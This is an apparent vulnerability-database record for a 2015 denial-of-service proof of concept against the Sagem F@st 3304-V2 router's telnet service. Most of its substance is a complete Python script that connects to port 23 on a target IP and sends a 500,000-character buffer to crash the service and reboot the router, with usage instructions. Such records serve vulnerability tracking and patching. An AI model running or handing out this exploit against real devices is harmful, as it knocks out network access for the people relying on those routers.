ID

VAR-E-201503-0247


EDB ID

36309


TITLE

Sagem F@st 3304-V2 - Telnet Crash (PoC) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36309

DESCRIPTION

Sagem F@st 3304-V2 - Telnet Crash (PoC). CVE-119602 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 36309

AFFECTED PRODUCTS

vendor:sagemmodel:f@stscope:eqversion:3304-v2

Trust: 1.0

vendor:sagemmodel:[email protected]scope:eqversion:3304-v2

Trust: 0.6

sources: EXPLOIT-DB: 36309 // EDBNET: 57658

EXPLOIT

# Title : Sagem F@st 3304-V2 Telnet Crash POC
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
# Date : 2015-03-08
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
#==========================
#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
#After the exploit is sent, the telnet service will crash and the router will reboot automatically.

#Usage: python SagemDos.py "IP address"

# Code
#========================================================================
#!/usr/bin/python
import socket
import sys
print("######################################")
print("# DOS Sagem F@st3304 v1-v2 #")
print("# ---------- #")
print("# BY LOUDIYI MOHAMED #")
print("#####################################")
if (len(sys.argv)<2):
print "Usage: %s <host> " % sys.argv[0]
print "Example: %s 192.168.1.1 " % sys.argv[0]
exit(0)
print "\nSending evil buffer..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "X"*500000
s.send(buffer)
except:
print "Could not connect to Sagem Telnet!"
#========================================================================

Trust: 1.0

sources: EXPLOIT-DB: 36309

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 36309

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36309

TYPE

Telnet Crash (PoC)

Trust: 1.0

sources: EXPLOIT-DB: 36309

CREDITS

Loudiyi Mohamed

Trust: 0.6

sources: EXPLOIT-DB: 36309

EXTERNAL IDS

db:EXPLOIT-DBid:36309

Trust: 1.6

db:EDBNETid:57658

Trust: 0.6

sources: EXPLOIT-DB: 36309 // EDBNET: 57658

REFERENCES

url:https://www.exploit-db.com/exploits/36309/

Trust: 0.6

sources: EDBNET: 57658

SOURCES

db:EXPLOIT-DBid:36309
db:EDBNETid:57658

LAST UPDATE DATE

2022-07-27T09:21:47.673000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:36309date:2015-03-08T00:00:00
db:EDBNETid:57658date:2015-03-08T00:00:00